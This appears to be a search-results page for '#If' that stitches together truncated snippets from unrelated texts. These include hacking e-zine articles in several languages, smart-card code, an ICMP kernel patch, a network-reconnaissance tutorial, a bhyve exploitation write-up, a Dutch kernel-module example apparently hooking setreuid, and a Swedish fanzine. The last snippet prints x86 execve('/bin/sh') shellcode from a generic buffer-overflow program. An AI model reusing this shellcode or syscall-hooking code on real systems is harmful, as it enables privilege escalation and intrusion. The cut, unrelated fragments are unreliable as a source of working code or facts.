#If

... ffer, 5); SIO_WaitForData(si, 1000); i = SIO_ReadBuffer(si, buffer, 32); memcpy(response, buffer + 1, 12); } void set_timeout(int t) { timeout = t; } #Ifdef 0 int main(int argc, char** argv) { Byte challenge[16] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; Byte pin[8] = { 0x35, 0x35, 0x35, 0x35, 0xff, 0xff, 0xff, 0xff }; Byte response[12]; init_card("/dev/ttyS1", pin); get_response(challenge, response); } #endif ------------ FIN ------------------------------------------------------------- File : getresponse.h ------------ Codigo Fuente ---------------------------------------------- ...

... de gran tamaño. icmp.patch static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct device *dev, __u32 saddr, __u32 daddr, int len) { #Ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS struct icmp_bxm icmp_param; if (len <= 1000) { /* solo contestamos a los ping que lleven menos de 1k de datos */ icmp_param.icmph=*icmph; icmp_param.icmph.type=ICMP_ECHOREPLY; icmp_param.data_ptr=(icmph+1); icmp_param.data_len=len; if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0) icmp_build_xmit(&icmp_param, daddr, saddr, skb->ip_hdr->tos); printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n", in_ntoa(saddr) ...

... noted with # and user prompts with a $). Now that that is out of the way lets start gathering information. First lets find out our IP on this network #Ifconfig This will show us a lot of information, right now what we are interested in is the label for "inet addr:" probably under eth0, or whatever NIC you are currently using to connect to the network. Note this address, it will be quite useful. Most likely it will be in one of the following ranges. 10.0.0.0 - 10.255.255.255 172.16.0.0 - 172.31.255.255 192.168.0.0 - 192.168.255.255 For the sake of this example we will assume your IP is 192.168.0.103, with a subnet mask of 255.255.255.0. Lets star ...

... me someone wants to download an EXE file. Even if I could dynamically generate new source file each time, I have simplified my approach with a set of #Ifdef, making different (randomly picked) parts of the source to be included in the build process. The compiler allowed me to set appropriate #define before I start the compilation, but when it comes to the randomization of code, it can be done with pure preprocessor directives as well [2] if anyone prefers it. Of course, randomized parts cannot change the application behavior and their execution should not matter. After analyzing different functions to be randomly imported I found SNMP and Bcrypt ...

... #0 r335510 host: --- bhyverun.c.orig +++ bhyverun.c @@ -1019,8 +1019,7 @@ assert(error == 0); } - if (lpc_bootrom()) - fwctl_init(); + fwctl_init(); #Ifndef WITHOUT_CAPSICUM bhyve_caph_cache_catpages(); Rest of this section will detail about the memory layout and techniques to convert the out-of-bound write to a full process r/w. ----[ 7.1 - Analysis of memory layout in the bss segment Unlike the heap, the memory adjacent to 'fget_str' has a deterministic layout since it is allocated in the .bss segment. Moreover, FreeBSD does not have ASLR or PIE, which helps in the exploitation of the bug. Following memory layout was observed in the test ...

... _SIZE strlen(END_TAG) #define SPLIT_TAG "-[ 2x" #define SPLIT_SIZE strlen(SPLIT_TAG) struct f_name { unsigned char name[256]; struct f_name *next; }; #Ifdef __alpha typedef unsigned int uint32; #else typedef unsigned long uint32; #endif struct MD5Context { uint32 buf[4]; uint32 bits[2]; unsigned char in[64]; }; void MD5Init(struct MD5Context *context); void MD5Update(struct MD5Context *context, unsigned char const *buf, unsigned len); void MD5Final(unsigned char digest[16], struct MD5Context *context); void MD5Transform(uint32 buf[4], uint32 const in[16]); typedef struct MD5Context MD5_CTX; #ifndef HIGHFIRST #define byteReverse(buf, len) #else v ...

... var tokiga. Också denna gång en LoC-spalt, dock inte lika stor som förra numret. Rolf Strömgren <rolf-str@privat.utfors.se> skickade följande: #Ifdef=läsaren_är_ej_Ahrvid_Engholm Sextant är en inåtriktad, hemlig och /så vidare... Klippetiklipp./ Rätt kul, om än kanske aningen styggt. :-) Det mesta har nog sagts redan i den här debatten. Det har varit både intressant och lärorikt. Jag ska nöja mig med den lilla reflektionen att man nog kan säga om båda lägren i diskussionen att 'visst, det kan vara så, men det behöver inte alltid vara så'. Kanske en jämförelse mellan The Magazine of Fantasy & Science Fiction och Isaac A ...

... ftersom Rickard har startat en liten skrivgrupp på Internet där inte Ahrvid får vara med. Eva Norman bidrar med en presentation av romans-fandom. *** #Ifdef=läsaren_är_ej_Ahrvid_Engholm Sextant är en inåtriktad, hemlig och sluten APA som styrs enväldigt av diktatorn Karl-Johan Norén, som egentligen är en svampliknande organism från Alfa Centauri, hitsänd för att infiltrera och överta sverifandom, fandom och sedan jorden. Metoderna härstammar bland annat från organisationen Gurka, som av vissa numera anses vara ytterst fånig och barnslig, men som givet sina förutsättningar var ytterst framgångsrik. Metoden som Sextant använder i infiltrationen oc ...

... oorbeeld module gaan bekijken. Deze heb ik gehaald uit het artikel van plaguez. #define MODULE #define __KERNEL__ #include <linux/config.h> #Ifdef MODULE #include <linux/module.h> #include <linux/version.h> #else #define MOD_INC_USE_COUNT #define MOD_DEC_USE_COUNT #endif #include <linux/types.h> #include <linux/fs.h> #include <linux/mm.h> #include <linux/errno.h> #include <asm/segment.h> #include <sys/syscall.h> #include <unistd.h> #include <linux/unistd.h> int errno; /* Hier wordt een pointer gedefineerd die naar de oude setreuid */ ...

... %l5 + 1 xor %o7, %o7, %o0 mov 1, %g1 ta %l5 + 1 Appendix B - Generic Buffer Overflow Program ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode.h #If defined(__i386__) && defined(__linux__) #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } #elif defined(__sparc__) && defined(__sun__) && defined(__svr4__) #define NOP_SIZE 4 char nop[]="\xac\x15\xa1\x6e"; char shellcode[] = "\x2d\ ...